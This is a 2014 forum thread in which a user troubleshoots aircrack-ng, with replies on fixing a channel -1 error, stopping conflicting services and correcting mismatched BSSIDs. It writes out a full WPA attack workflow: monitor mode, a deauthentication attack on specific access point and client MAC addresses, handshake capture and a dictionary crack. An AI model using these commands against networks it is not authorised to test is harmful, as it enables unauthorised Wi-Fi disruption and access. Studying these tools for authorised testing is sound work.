aireplay-ng --ignore-negative-one[SOLVED]

th3_kRak3n · October 27, 2014, 10:12:24 PM

asking because i dont find english solutions to this problems. google not really helping either:

aireplay-ng -0 2 -a MAC1 -c MAC2 mon0
waiting for beacon frame (BISSD: MAC1) on channel -1
couldn't determain current channel for mon0, you should either fore the
operation with --ignore-negative-one or apply a kernel patch

1. how do i type the —ignore-negative one in my command » 1st to see
if that takes issue away
2. kernel patch if option 1 is not the solution > no idea how
3. why would i want to use the ESSID when the BISSD is ?more accurate?

ZEROF · October 27, 2014, 10:19:19 PM

Stop network manager from your menu>services>network manager .... or from terminal then run aireplay etc... If this is not working, then install patched drivers, you can find howto in this forum.

P.S. Provide me your chipset and drivers you are using and i will show you how to install patched drivers. For that check if you have this tools installed:

apt-get install ethtool

To get info about your chipset and drivers

ethtool wlan0 or ethtool -i wlan0

Provide me with good info, and solution is posted before but let's see what we can do for you.

To learn, chipset are Ralink, TP-LINK etc and drivers are something like rtxxx or rtlxxx etc..

drego85 · October 28, 2014, 09:16:56 PM

Of course, as has already been said ZEROF, you have to stop programs in concurrent executions for aircrack. To do this you should run this command:

$ airmon-ng check kill

Andrea

nix8 · October 29, 2014, 07:32:21 AM

I've encountered this error in the past many times. I own four different Alfa wireless NICs, and to get around this problem all I have to do is:

service network-manager stop
airmon-ng check kill && airmon-ng start wlan0
ifconfig wlan0 down
airodump-ng -f 1000 mon0 (as an example)

I usually double check wpa_supplicant is not running as it does seem to affect monitor mode.

killall wpa_supplicant

You're monitor interface (eg mon0) will still be available even after putting your primary wireless interface (eg wlan0) down. This fixes the -1 channel issue for me without patching any drivers.

Hope this helps.

th3_kRak3n · October 29, 2014, 08:49:24 PM

thanks guys, sorry for the delay but got tide up with work.
thank you for the advice above, i followed it, and this is what happened:

airmon-ng
airmon-ng start wlan0

killall wpa_supplicant
service network-manager stop
airmon-ng check kill && airmon-ng start wlan0
ifconfig wlan0 down

airodump-ng mon0
>airodump-ng -f 1000
airodump-ng -c 1 --bssid E0:91:F5:84:8C:50 -w /home/krak3n/Desktop mon0

aireplay-ng -0 2 -a F8:1A:67:83:4C:B8 -c 94:35:0A:3F:56:3F mon0
20:31:34 Waiting for beacon frame (BSSID: F8:1A:67:83:4C:B8) on channel 12
20:31:35 mon0 is on channel 12, but the AP uses channel 5

aircrack-ng -a2 -b F8:1A:67:83:4C:B8 -w /etc/dictionaries-common/words /home/krak3n/Desktop/*.cap

<took about 15min>
passphrase not found, quitting aircrack

>> what does the bold mean ? LoL > non the less i went on with it, cause i saw the .cap file got bigger in size
it didn't have the pass-phrase. Do you think a proper big dictionary would resolve this? any suggestions or
a nudge in the right direction about the dictionary file?

weVeg · October 29, 2014, 11:10:21 PM

guys thers is somethings wrong with this attack....
this kind of replay aireplay-ng -0 2 -a F8:1A:67:83:4C:B8 -c 94:35:0A:3F:56:3F mon0 is made to select the frame and then replay it to collect ivs that doesn't need to crack wpa...
for wpa you need to catch the handshake and then try bruteforce or dict....
you mix your attacks

nix8 · October 30, 2014, 03:07:18 AM

aireplay-ng -0 is a deauth attack. It's often very effective as clients will be forced to disconnect and reconnect. There's your four-way handshake.

krak3n:

airodump-ng -c 1 --bssid E0:91:F5:84:8C:50 -w /home/krak3n/Desktop mon0
This locks mon0 to channel 1.

aireplay-ng -0 2 -a F8:1A:67:83:4C:B8 -c 94:35:0A:3F:56:3F mon0
This will fail if the access point is not on channel one. Also, the BSSIDs do not match.. E0:91:F5:84:8C:50 vs F8:1A:67:83:4C:B8

You should probably read about how to use the tools a little more. See http://www.aircrack-ng.org/doku.php

th3_kRak3n · October 30, 2014, 01:28:01 PM

apologies guys, seems that in my hurry i copied and paste wrongly from my history file last night. i tried 2 diff wifi routers. got mixed up
i appreciate all the help though.

weVeg · October 30, 2014, 05:32:51 PM

ups =)
I didn't check aireplays help!
Just what I remember about aircrack-ng ( I made a mistake with "2" flag) !
sorry!!